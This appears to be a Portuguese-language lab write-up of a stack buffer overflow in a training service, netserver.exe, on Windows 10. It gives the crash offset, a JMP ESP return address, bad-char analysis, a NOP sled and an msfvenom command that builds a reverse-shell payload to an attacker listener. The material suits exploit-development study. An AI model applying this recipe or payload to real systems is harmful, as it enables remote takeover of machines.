Share
## https://sploitus.com/exploit?id=74AA3D93-5808-53A3-83D5-7F37EB9D1609
🛠️ Configuração do Laboratório (Lab Setup)
Para reproduzir este exploit, utilize o ambiente controlado abaixo:

1. Ambiente Virtual
SO Alvo: Windows 10 Enterprise.

Download: https://www.microsoft.com/pt-br/evalcenter/evaluate-windows-10-enterprise

2. Binários Vulneráveis
Os arquivos necessários estão compactados na pasta /binaries.

Arquivo: binaries.7z

Senha: hunter1

Instrução: Extraia o netserver.exe e a netserver.dll para o Desktop do Windows 10. Ambos devem estar na mesma pasta para o funcionamento correto da exploração.

📌 Descrição
Este repositório contém o código de exploração para uma vulnerabilidade de Stack-based Buffer Overflow identificada no serviço netserver.exe. O exploit demonstra o ciclo completo de desenvolvimento: desde o controle do fluxo de execução (EIP) até a execução de comandos remotos (RCE) via reverse shell.

🛠️ Detalhes Técnicos
1. Fuzzing Inicial e Controle de EIP
O primeiro passo foi testar os limites do comando SEND. Através de testes de estresse com buffers incrementais, identifiquei que o serviço transborda após 2007 bytes.
Vetor: Comando SEND
Offset: 2007 bytes de preenchimento (padding)
![alt text](Images/Crash.png)
![alt text](Images/Crash2.png)

2. Redirecionamento de Execução
Para contornar endereços dinâmicos, utilizei o endereço de retorno 0x625012a0 da netserver.dll. Este endereço contém a instrução JMP ESP, que redireciona o ponteiro de execução diretamente para o nosso buffer na pilha.
![alt text](Images/!monafind.png)
![alt text](Images/image-2.png)

3. Identificação de Bad Chars e Payload
Analisei a memória para identificar caracteres que corrompiam o payload. O caractere nulo \x00 foi o principal "Bad Char" filtrado. Para a geração do shellcode, utilizei o seguinte comando:
```bash

msfvenom -p windows/shell_reverse_tcp lhost=192.168.18.42 lport=443 exitfunc=thread -b "\x00" -f c
```
4. Alinhamento de Memória (NOP Sled)
Implementei um NOP Sled (32 bytes de \x90) para garantir que o processador tenha uma "área de escape" segura. Isso evita que o processo de autodecodificação do shellcode corrompa o próprio payload durante a execução.
![alt text](Images/90.png)

5. Remote Code Execution (RCE)
A etapa final demonstra a execução bem-sucedida do exploit, resultando em uma shell reversa funcional com privilégios totais sobre o sistema alvo.
![alt text](Images/image-8.png)

⚠️ Disclaimer
Este projeto foi desenvolvido estritamente para fins educacionais e de pesquisa em segurança da informação. O uso destas técnicas em sistemas sem autorização prévia é ilegal.